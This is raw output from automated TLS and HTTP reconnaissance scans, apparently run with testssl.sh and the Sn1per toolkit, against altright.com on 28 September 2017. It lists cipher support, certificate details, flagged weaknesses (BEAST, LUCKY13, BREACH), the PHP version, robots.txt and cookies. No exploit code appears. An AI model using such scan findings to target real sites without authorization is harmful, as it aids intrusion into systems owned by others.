- Accepted TLSv1.0 256 bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
- SSL Certificate:
- Signature Algorithm: ecdsa-with-SHA256
- Subject: sni190556.cloudflaressl.com
- Altnames: DNS:sni190556.cloudflaressl.com, DNS:*.444ttg.com, DNS:*.66ddl.com, DNS:*.6yyl.com, DNS:*.altright.com, DNS:*.arktos.com, DNS:*.biseznamka.com, DNS:*.deitti-sivut.com, DNS:*.dsfredmdtom.cf, DNS:*.eggendk.cf, DNS:*.embroiddesigns.net, DNS:*.foragerproject.com, DNS:*.huntingdonmcdonalds.com, DNS:*.jomsey.altervista.org, DNS:*.joyeati.cf, DNS:*.lewfi.stream, DNS:*.minnehaha-kendo.org, DNS:*.minnehahakendodojo.org, DNS:*.mujeresbolivia.com, DNS:*.punkchat.co.za, DNS:*.smart-eas.ru, DNS:*.spankingchat.ca, DNS:*.teacoal.xyz, DNS:444ttg.com, DNS:66ddl.com, DNS:6yyl.com, DNS:altright.com, DNS:arktos.com, DNS:biseznamka.com, DNS:deitti-sivut.com, DNS:dsfredmdtom.cf, DNS:eggendk.cf, DNS:embroiddesigns.net, DNS:foragerproject.com, DNS:huntingdonmcdonalds.com, DNS:jomsey.altervista.org, DNS:joyeati.cf, DNS:lewfi.stream, DNS:minnehaha-kendo.org, DNS:minnehahakendodojo.org, DNS:mujeresbolivia.com, DNS:punkchat.co.za, DNS:smart-eas.ru, DNS:spankingchat.ca, DNS:teacoal.xyz
- Issuer: COMODO ECC Domain Validation Secure Server CA 2
- Not valid before: Aug 12 00:00:00 2017 GMT
- Not valid after: Feb 18 23:59:59 2018 GMT
- ######################################################################################################################################
- testssl 2.9dev from https://testssl.sh/dev/
- This program is free software. Distribution and
- modification under GPLv2 permitted.
- USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!
- Please file bugs @ https://testssl.sh/bugs/
- ######################################################################################################################################
- Using "OpenSSL 1.0.2-chacha (1.0.2i-dev)" [~183 ciphers]
- on Kali:/usr/share/sniper/plugins/testssl.sh/bin/openssl.Linux.x86_64
- (built: "Jun 22 19:32:29 2016", platform: "linux-x86_64")
- Testing all IPv4 addresses (port 443): 104.27.179.91 104.27.178.91
- -----------------------------------------------------
- Start 2017-09-28 08:05:35 -->> 104.27.179.91:443 (altright.com) <<--
- further IP addresses: 104.27.178.91 2400:cb00:2048:1::681b:b35b
- 2400:cb00:2048:1::681b:b25b
- rDNS (104.27.179.91): --
- Service detected: HTTP
- Testing protocols via sockets except SPDY+HTTP2
- SSLv2 not offered (OK)
- SSLv3 not offered (OK)
- TLS 1 offered
- TLS 1.1 offered
- TLS 1.2 offered (OK)
- SPDY/NPN h2, spdy/3.1, http/1.1 (advertised)
- HTTP2/ALPN h2, spdy/3.1, http/1.1 (offered)
- Testing ~standard cipher categories
- NULL ciphers (no encryption) not offered (OK)
- Anonymous NULL Ciphers (no authentication) not offered (OK)
- Export ciphers (w/o ADH+NULL) not offered (OK)
- LOW: 64 Bit + DES encryption (w/o export) not offered (OK)
- Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) not offered (OK)
- Triple DES Ciphers (Medium) not offered (OK)
- High encryption (AES+Camellia, no AEAD) offered (OK)
- Strong encryption (AEAD ciphers) offered (OK)
- Testing robust (perfect) forward secrecy, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4
- PFS is offered (OK) ECDHE-ECDSA-CHACHA20-POLY1305-OLD
- ECDHE-ECDSA-AES256-GCM-SHA384
- ECDHE-ECDSA-AES256-SHA384 ECDHE-ECDSA-AES256-SHA
- ECDHE-ECDSA-CHACHA20-POLY1305
- ECDHE-ECDSA-AES128-GCM-SHA256
- ECDHE-ECDSA-AES128-SHA256 ECDHE-ECDSA-AES128-SHA
- Elliptic curves offered: secp224r1 prime256v1 secp384r1 secp521r1 X25519
- Testing server preferences
- Has server cipher order? yes (OK)
- Negotiated protocol TLSv1.2
- Negotiated cipher ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
- Cipher order
- TLSv1: ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
- TLSv1.1: ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
- TLSv1.2: ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDHE-ECDSA-CHACHA20-POLY1305
- ECDHE-ECDSA-AES128-GCM-SHA256 ECDHE-ECDSA-AES128-SHA
- ECDHE-ECDSA-AES128-SHA256 ECDHE-ECDSA-AES256-GCM-SHA384
- ECDHE-ECDSA-AES256-SHA ECDHE-ECDSA-AES256-SHA384
- Testing server defaults (Server Hello)
- TLS extensions (standard) "renegotiation info/#65281" "server name/#0"
- "session ticket/#35" "status request/#5"
- "next protocol/#13172" "EC point formats/#11"
- "extended master secret/#23"
- "signed certificate timestamps/#18"
- "application layer protocol negotiation/#16"
- Session Ticket RFC 5077 hint 64800 seconds, session tickets keys seems to be rotated < daily
- SSL Session ID support yes
- Session Resumption Tickets: yes, ID: yes
- TLS clock skew -1 sec from localtime
- Signature Algorithm ECDSA with SHA256
- Server key size ECDSA 256 bits
- Fingerprint / Serial SHA1 3AF38101A73A8494677D499017A4E3EFDD1904B5 / 6DBD6BD78F91E08014D6D046DB20B529
- SHA256 2BE0A7BAE715E0B69AF50EE7881BEE311C24D4CDC7DFAF888B69F3D0FA69D902
- Common Name (CN) sni190556.cloudflaressl.com (request w/o SNI didn't succeed, usual for EC certificates)
- subjectAltName (SAN) sni190556.cloudflaressl.com *.444ttg.com
- *.66ddl.com *.6yyl.com *.altright.com
- *.arktos.com *.biseznamka.com *.deitti-sivut.com
- *.dsfredmdtom.cf *.eggendk.cf
- *.embroiddesigns.net *.foragerproject.com
- *.huntingdonmcdonalds.com *.jomsey.altervista.org
- *.joyeati.cf *.lewfi.stream *.minnehaha-kendo.org
- *.minnehahakendodojo.org *.mujeresbolivia.com
- *.punkchat.co.za *.smart-eas.ru *.spankingchat.ca
- *.teacoal.xyz 444ttg.com 66ddl.com 6yyl.com
- altright.com arktos.com biseznamka.com
- deitti-sivut.com dsfredmdtom.cf eggendk.cf
- embroiddesigns.net foragerproject.com
- huntingdonmcdonalds.com jomsey.altervista.org
- joyeati.cf lewfi.stream minnehaha-kendo.org
- minnehahakendodojo.org mujeresbolivia.com
- punkchat.co.za smart-eas.ru spankingchat.ca
- teacoal.xyz
- Issuer COMODO ECC Domain Validation Secure Server CA 2 (COMODO CA Limited from GB)
- Trust (hostname) Ok via SAN (SNI mandatory)
- Chain of trust Ok
- EV cert (experimental) no
- Certificate Expiration 143 >= 60 days (2017-08-11 20:00 --> 2018-02-18 18:59 -0500)
- # of certificates provided 3
- Certificate Revocation List http://crl.comodoca4.com/COMODOECCDomainValidationSecureServerCA2.crl
- OCSP URI http://ocsp.comodoca4.com
- OCSP stapling offered
- OCSP must staple no
- DNS CAA RR (experimental) --
- Certificate Transparency yes (TLS extension)
- Testing HTTP header response @ "/"
- HTTP Status Code 200 OK
- HTTP clock skew +2 (± 1.5) sec from localtime
- Strict Transport Security --
- Public Key Pinning --
- Server banner cloudflare-nginx
- Application banner X-Powered-By: PHP/5.6.31
- Cookie(s) 2 issued: 2/2 secure, 2/2 HttpOnly
- Security headers --
- Reverse Proxy banner --
- Testing vulnerabilities
- Heartbleed (CVE-2014-0160) not vulnerable (OK), no heartbeat extension
- CCS (CVE-2014-0224) not vulnerable (OK)
- Ticketbleed (CVE-2016-9244), experiment. not vulnerable (OK), no session tickets
- Secure Renegotiation (CVE-2009-3555) not vulnerable (OK)
- Secure Client-Initiated Renegotiation not vulnerable (OK)
- CRIME, TLS (CVE-2012-4929) not vulnerable (OK)
- BREACH (CVE-2013-3587) potentially NOT ok, uses gzip HTTP compression. - only supplied "/" tested
- Can be ignored for static pages or if no secrets in the page
- POODLE, SSL (CVE-2014-3566) not vulnerable (OK)
- TLS_FALLBACK_SCSV (RFC 7507) Downgrade attack prevention supported (OK)
- SWEET32 (CVE-2016-2183, CVE-2016-6329) not vulnerable (OK)
- FREAK (CVE-2015-0204) not vulnerable (OK)
- DROWN (CVE-2016-0800, CVE-2016-0703) not vulnerable on this host and port (OK)
- no RSA certificate, thus certificate can't be used with SSLv2 elsewhere
- LOGJAM (CVE-2015-4000), experimental not vulnerable (OK): no DH EXPORT ciphers, no DH key detected
- BEAST (CVE-2011-3389) TLS1: ECDHE-ECDSA-AES128-SHA
- ECDHE-ECDSA-AES256-SHA
- VULNERABLE -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
- LUCKY13 (CVE-2013-0169), experimental potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS
- RC4 (CVE-2013-2566, CVE-2015-2808) no RC4 ciphers detected (OK)
- Testing 359 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength
- Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
- -----------------------------------------------------------------------------------------------------------------------------
- xcc14 ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDH 256 ChaCha20 256 TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256_OLD
- xc02c ECDHE-ECDSA-AES256-GCM-SHA384 ECDH 256 AESGCM 256 TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
- xc024 ECDHE-ECDSA-AES256-SHA384 ECDH 256 AES 256 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384
- xc00a ECDHE-ECDSA-AES256-SHA ECDH 256 AES 256 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
- xcca9 ECDHE-ECDSA-CHACHA20-POLY1305 ECDH 253 ChaCha20 256 TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256
- xc02b ECDHE-ECDSA-AES128-GCM-SHA256 ECDH 256 AESGCM 128 TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
- xc023 ECDHE-ECDSA-AES128-SHA256 ECDH 256 AES 128 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256
- xc009 ECDHE-ECDSA-AES128-SHA ECDH 256 AES 128 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
- Running client simulations via sockets
- Android 2.3.7 No connection
- Android 4.1.1 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- Android 4.3 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- Android 4.4.2 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Android 5.0.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
- Android 6.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
- Android 7.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305, 253 bit ECDH (X25519)
- Chrome 51 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 253 bit ECDH (X25519)
- Chrome 57 Win 7 No connection
- Firefox 49 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Firefox 53 Win 7 No connection
- IE 6 XP No connection
- IE 7 Vista TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- IE 8 XP No connection
- IE 8 Win 7 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- IE 11 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- IE 11 Win 8.1 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- IE 11 Win Phone 8.1 Update TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- IE 11 Win 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Edge 13 Win 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Edge 13 Win Phone 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Opera 17 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- Safari 7 iOS 7.1 TLSv1.2 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- Safari 9 OS X 10.11 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Safari 10 OS X 10.12 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Apple ATS 9 iOS 9 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Tor 17.0.9 Win 7 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- Java 6u45 No connection
- Java 7u25 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- Java 8u31 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- OpenSSL 1.0.1l TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- OpenSSL 1.0.2e TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Done 2017-09-28 08:09:15 [ 222s] -->> 104.27.179.91:443 (altright.com) <<--
- -----------------------------------------------------
- Start 2017-09-28 08:09:15 -->> 104.27.178.91:443 (altright.com) <<--
- further IP addresses: 104.27.179.91 2400:cb00:2048:1::681b:b35b
- 2400:cb00:2048:1::681b:b25b
- rDNS (104.27.178.91): --
- Service detected: HTTP
- Testing protocols via sockets except SPDY+HTTP2
- SSLv2 not offered (OK)
- SSLv3 not offered (OK)
- TLS 1 offered
- TLS 1.1 offered
- TLS 1.2 offered (OK)
- SPDY/NPN h2, spdy/3.1, http/1.1 (advertised)
- HTTP2/ALPN h2, spdy/3.1, http/1.1 (offered)
- Testing ~standard cipher categories
- NULL ciphers (no encryption) not offered (OK)
- Anonymous NULL Ciphers (no authentication) not offered (OK)
- Export ciphers (w/o ADH+NULL) not offered (OK)
- LOW: 64 Bit + DES encryption (w/o export) not offered (OK)
- Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) not offered (OK)
- Triple DES Ciphers (Medium) not offered (OK)
- High encryption (AES+Camellia, no AEAD) offered (OK)
- Strong encryption (AEAD ciphers) offered (OK)
- Testing robust (perfect) forward secrecy, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4
- PFS is offered (OK) ECDHE-ECDSA-CHACHA20-POLY1305-OLD
- ECDHE-ECDSA-AES256-GCM-SHA384
- ECDHE-ECDSA-AES256-SHA384 ECDHE-ECDSA-AES256-SHA
- ECDHE-ECDSA-CHACHA20-POLY1305
- ECDHE-ECDSA-AES128-GCM-SHA256
- ECDHE-ECDSA-AES128-SHA256 ECDHE-ECDSA-AES128-SHA
- Elliptic curves offered: secp224r1 prime256v1 secp384r1 secp521r1 X25519
- Testing server preferences
- Has server cipher order? yes (OK)
- Negotiated protocol TLSv1.2
- Negotiated cipher ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
- Cipher order
- TLSv1: ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
- TLSv1.1: ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
- TLSv1.2: ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDHE-ECDSA-CHACHA20-POLY1305
- ECDHE-ECDSA-AES128-GCM-SHA256 ECDHE-ECDSA-AES128-SHA
- ECDHE-ECDSA-AES128-SHA256 ECDHE-ECDSA-AES256-GCM-SHA384
- ECDHE-ECDSA-AES256-SHA ECDHE-ECDSA-AES256-SHA384
- Testing server defaults (Server Hello)
- TLS extensions (standard) "renegotiation info/#65281" "server name/#0"
- "session ticket/#35" "status request/#5"
- "next protocol/#13172" "EC point formats/#11"
- "extended master secret/#23"
- "signed certificate timestamps/#18"
- "application layer protocol negotiation/#16"
- Session Ticket RFC 5077 hint 64800 seconds, session tickets keys seems to be rotated < daily
- SSL Session ID support yes
- Session Resumption Tickets: yes, ID: yes
- TLS clock skew -1 sec from localtime
- Signature Algorithm ECDSA with SHA256
- Server key size ECDSA 256 bits
- Fingerprint / Serial SHA1 3AF38101A73A8494677D499017A4E3EFDD1904B5 / 6DBD6BD78F91E08014D6D046DB20B529
- SHA256 2BE0A7BAE715E0B69AF50EE7881BEE311C24D4CDC7DFAF888B69F3D0FA69D902
- Common Name (CN) sni190556.cloudflaressl.com (request w/o SNI didn't succeed, usual for EC certificates)
- subjectAltName (SAN) sni190556.cloudflaressl.com *.444ttg.com
- *.66ddl.com *.6yyl.com *.altright.com
- *.arktos.com *.biseznamka.com *.deitti-sivut.com
- *.dsfredmdtom.cf *.eggendk.cf
- *.embroiddesigns.net *.foragerproject.com
- *.huntingdonmcdonalds.com *.jomsey.altervista.org
- *.joyeati.cf *.lewfi.stream *.minnehaha-kendo.org
- *.minnehahakendodojo.org *.mujeresbolivia.com
- *.punkchat.co.za *.smart-eas.ru *.spankingchat.ca
- *.teacoal.xyz 444ttg.com 66ddl.com 6yyl.com
- altright.com arktos.com biseznamka.com
- deitti-sivut.com dsfredmdtom.cf eggendk.cf
- embroiddesigns.net foragerproject.com
- huntingdonmcdonalds.com jomsey.altervista.org
- joyeati.cf lewfi.stream minnehaha-kendo.org
- minnehahakendodojo.org mujeresbolivia.com
- punkchat.co.za smart-eas.ru spankingchat.ca
- teacoal.xyz
- Issuer COMODO ECC Domain Validation Secure Server CA 2 (COMODO CA Limited from GB)
- Trust (hostname) Ok via SAN (SNI mandatory)
- Chain of trust Ok
- EV cert (experimental) no
- Certificate Expiration 143 >= 60 days (2017-08-11 20:00 --> 2018-02-18 18:59 -0500)
- # of certificates provided 3
- Certificate Revocation List http://crl.comodoca4.com/COMODOECCDomainValidationSecureServerCA2.crl
- OCSP URI http://ocsp.comodoca4.com
- OCSP stapling offered
- OCSP must staple no
- DNS CAA RR (experimental) --
- Certificate Transparency yes (TLS extension)
- Testing HTTP header response @ "/"
- HTTP Status Code 200 OK
- HTTP clock skew +2 (± 1.5) sec from localtime
- Strict Transport Security --
- Public Key Pinning --
- Server banner cloudflare-nginx
- Application banner X-Powered-By: PHP/5.6.31
- Cookie(s) 2 issued: 2/2 secure, 2/2 HttpOnly
- Security headers --
- Reverse Proxy banner --
- Testing vulnerabilities
- Heartbleed (CVE-2014-0160) not vulnerable (OK), no heartbeat extension
- CCS (CVE-2014-0224) not vulnerable (OK)
- Ticketbleed (CVE-2016-9244), experiment. not vulnerable (OK), no session tickets
- Secure Renegotiation (CVE-2009-3555) not vulnerable (OK)
- Secure Client-Initiated Renegotiation not vulnerable (OK)
- CRIME, TLS (CVE-2012-4929) not vulnerable (OK)
- BREACH (CVE-2013-3587) potentially NOT ok, uses gzip HTTP compression. - only supplied "/" tested
- Can be ignored for static pages or if no secrets in the page
- POODLE, SSL (CVE-2014-3566) not vulnerable (OK)
- TLS_FALLBACK_SCSV (RFC 7507) Downgrade attack prevention supported (OK)
- SWEET32 (CVE-2016-2183, CVE-2016-6329) not vulnerable (OK)
- FREAK (CVE-2015-0204) not vulnerable (OK)
- DROWN (CVE-2016-0800, CVE-2016-0703) not vulnerable on this host and port (OK)
- no RSA certificate, thus certificate can't be used with SSLv2 elsewhere
- LOGJAM (CVE-2015-4000), experimental not vulnerable (OK): no DH EXPORT ciphers, no DH key detected
- BEAST (CVE-2011-3389) TLS1: ECDHE-ECDSA-AES128-SHA
- ECDHE-ECDSA-AES256-SHA
- VULNERABLE -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
- LUCKY13 (CVE-2013-0169), experimental potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS
- RC4 (CVE-2013-2566, CVE-2015-2808) no RC4 ciphers detected (OK)
- Testing 359 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength
- Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
- -----------------------------------------------------------------------------------------------------------------------------
- xcc14 ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDH 256 ChaCha20 256 TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256_OLD
- xc02c ECDHE-ECDSA-AES256-GCM-SHA384 ECDH 256 AESGCM 256 TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
- xc024 ECDHE-ECDSA-AES256-SHA384 ECDH 256 AES 256 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384
- xc00a ECDHE-ECDSA-AES256-SHA ECDH 256 AES 256 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
- xcca9 ECDHE-ECDSA-CHACHA20-POLY1305 ECDH 253 ChaCha20 256 TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256
- xc02b ECDHE-ECDSA-AES128-GCM-SHA256 ECDH 256 AESGCM 128 TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
- xc023 ECDHE-ECDSA-AES128-SHA256 ECDH 256 AES 128 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256
- xc009 ECDHE-ECDSA-AES128-SHA ECDH 256 AES 128 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
- Running client simulations via sockets
- Android 2.3.7 No connection
- Android 4.1.1 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- Android 4.3 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- Android 4.4.2 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Android 5.0.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
- Android 6.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
- Android 7.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305, 253 bit ECDH (X25519)
- Chrome 51 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 253 bit ECDH (X25519)
- Chrome 57 Win 7 No connection
- Firefox 49 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Firefox 53 Win 7 No connection
- IE 6 XP No connection
- IE 7 Vista TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- IE 8 XP No connection
- IE 8 Win 7 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- IE 11 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- IE 11 Win 8.1 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- IE 11 Win Phone 8.1 Update TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- IE 11 Win 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Edge 13 Win 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Edge 13 Win Phone 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Opera 17 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- Safari 7 iOS 7.1 TLSv1.2 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- Safari 9 OS X 10.11 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Safari 10 OS X 10.12 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Apple ATS 9 iOS 9 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Tor 17.0.9 Win 7 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- Java 6u45 No connection
- Java 7u25 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- Java 8u31 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- OpenSSL 1.0.1l TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- OpenSSL 1.0.2e TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Done 2017-09-28 08:13:02 [ 449s] -->> 104.27.178.91:443 (altright.com) <<--
- -----------------------------------------------------
- Done testing now all IP addresses (on port 443): 104.27.179.91 104.27.178.91
- ███▄ ▄███▓ ▄▄▄ ██████ ██████ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄
- ▓██▒▀█▀ ██▒▒████▄ ▒██ ▒ ▒██ ▒ ▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌
- ▓██ ▓██░▒██ ▀█▄ ░ ▓██▄ ░ ▓██▄ ▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌
- ▒██ ▒██ ░██▄▄▄▄██ ▒ ██▒ ▒ ██▒▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌
- ▒██▒ ░██▒ ▓█ ▓██▒▒██████▒▒▒██████▒▒░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓
- ░ ▒░ ░ ░ ▒▒ ▓▒█░▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒
- ░ ░ ░ ▒ ▒▒ ░░ ░▒ ░ ░░ ░▒ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒
- ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
- ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
- ░ ░
- + -- --=[MÄŚŚBĻËËĐ V20160303 BŸ 1Ņ3 @ ĊŖÖŴĐŚȞÏËĻĐ - https://crowdshield.com
- + -- --=[Scan Complete!
- + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
- + -- --=[Checking if X-Content options are enabled on altright.com...
- + -- --=[Checking if X-Frame options are enabled on altright.com...
- + -- --=[Checking if X-XSS-Protection header is enabled on altright.com...
- + -- --=[Checking HTTP methods on altright.com...
- + -- --=[Checking if TRACE method is enabled on altright.com...
- + -- --=[Checking for META tags on altright.com...
- <div class="post-meta clear-fix">
- <div class="meta-comment">
- <div class="post-meta clear-fix">
- <div class="meta-comment">
- <div class="post-meta clear-fix">
- <div class="meta-comment">
- <div class="post-meta clear-fix">
- <div class="meta-comment">
- <div class="post-meta clear-fix">
- <div class="meta-comment">
- + -- --=[Checking for open proxy on altright.com...
- + -- --=[Enumerating software on altright.com...
- x-powered-by: PHP/5.6.31
- server: cloudflare-nginx
- + -- --=[Checking if Strict-Transport-Security is enabled on altright.com...
- + -- --=[Checking for Flash cross-domain policy on altright.com...
- </script>
- <script type='text/javascript' src='https://altright.com/wp-content/mmr/92266b7b-1484416759.min.js'></script>
- <script type='text/javascript' src='https://stats.wp.com/e-201739.js' async defer></script>
- <script type='text/javascript'>
- _stq = window._stq || [];
- _stq.push([ 'view', {v:'ext',j:'1:5.3',blog:'99656275',post:'0',tz:'-4',srv:'altright.com'} ]);
- _stq.push([ 'clickTrackerInit', '99656275', '0' ]);
- </script>
- </body>
- </html>
- + -- --=[Checking for Silverlight cross-domain policy on altright.com...
- </script>
- <script type='text/javascript' src='https://altright.com/wp-content/mmr/92266b7b-1484416759.min.js'></script>
- <script type='text/javascript' src='https://stats.wp.com/e-201739.js' async defer></script>
- <script type='text/javascript'>
- _stq = window._stq || [];
- _stq.push([ 'view', {v:'ext',j:'1:5.3',blog:'99656275',post:'0',tz:'-4',srv:'altright.com'} ]);
- _stq.push([ 'clickTrackerInit', '99656275', '0' ]);
- </script>
- </body>
- </html>
- + -- --=[Checking for HTML5 cross-origin resource sharing on altright.com...
- + -- --=[Retrieving robots.txt on altright.com...
- Sitemap: https://altright.com/sitemap.xml
- Sitemap: https://altright.com/news-sitemap.xml
- User-agent: *
- Disallow: /wp-admin/
- Allow: /wp-admin/admin-ajax.php
- + -- --=[Retrieving sitemap.xml on altright.com...
- <?xml version="1.0" encoding="UTF-8"?>
- <!--generator='jetpack-5.3'-->
- <?xml-stylesheet type="text/xsl" href="https://altright.com/sitemap-index.xsl"?>
- <sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://altright.com/sitemap-1.xml</loc><lastmod>2017-09-28T08:37:00Z</lastmod></sitemap><sitemap><loc>https://altright.com/image-sitemap-1.xml</loc><lastmod>2017-09-27T17:56:15Z</lastmod></sitemap></sitemapindex>
- + -- --=[Checking cookie attributes on altright.com...
- set-cookie: __cfduid=de49c65298b1f115523ab9284f1c5918f1506600795; expires=Fri, 28-Sep-18 12:13:15 GMT; path=/; domain=.altright.com; HttpOnly; Secure
